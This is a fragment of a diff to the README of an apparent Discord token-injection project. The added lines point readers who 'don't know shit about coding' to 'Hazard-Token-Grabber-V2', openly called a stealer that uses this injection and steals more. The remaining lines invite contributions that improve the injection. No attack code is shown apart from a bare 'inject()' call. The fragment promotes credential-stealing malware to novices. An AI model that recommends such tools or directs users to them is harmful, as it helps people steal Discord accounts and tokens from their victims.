vostok115/Discord-Injection/README.md

     inject()
 ```

+## 🎉・Want to use it but don't know shit about coding?
+No worries, [Hazard-Token-Grabber-V2](https://github.com/Rdimo/Hazard-Token-Grabber-V2) is a stealer that uses this injection + steals more!

 ## 🤝・Contributing

 Any ideas on how to improve the injection?
 Or just think you got something you want to see being added?
 [Open a new issue](https://github.com/rdimo/Discord-injection/issues)!